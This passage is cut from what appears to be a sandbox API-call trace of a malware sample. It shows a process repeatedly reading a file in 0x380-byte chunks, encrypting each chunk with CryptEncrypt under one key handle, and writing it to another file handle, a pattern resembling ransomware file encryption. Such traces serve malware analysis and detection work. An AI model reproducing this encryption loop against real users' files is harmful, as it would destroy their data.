| out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.010] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.010] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.010] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.010] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.010] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.010] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.011] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.011] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.011] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.011] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.011] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.011] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.011] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.011] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.011] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.011] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.011] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.011] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.011] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.012] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.012] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.012] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.012] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.012] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.012] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.012] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.012] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.012] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.012] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.012] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.013] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.013] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.013] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.013] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.013] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.013] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.013] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.013] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.013] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.013] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.013] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.013] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.013] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.013] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.014] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.014] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.014] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.014] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.014] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.014] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.014] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.014] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.014] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.014] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.014] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.014] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.014] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.014] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.015] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.015] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.015] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.015] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.015] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.015] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.015] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.015] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.015] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.015] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.015] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.015] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.016] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.016] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.016] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.016] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.016] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.016] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.016] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.016] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.016] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.016] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.016] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.016] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.017] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.017] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.017] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.017] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.017] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.017] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.018] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.018] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.018] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.018] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.018] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, 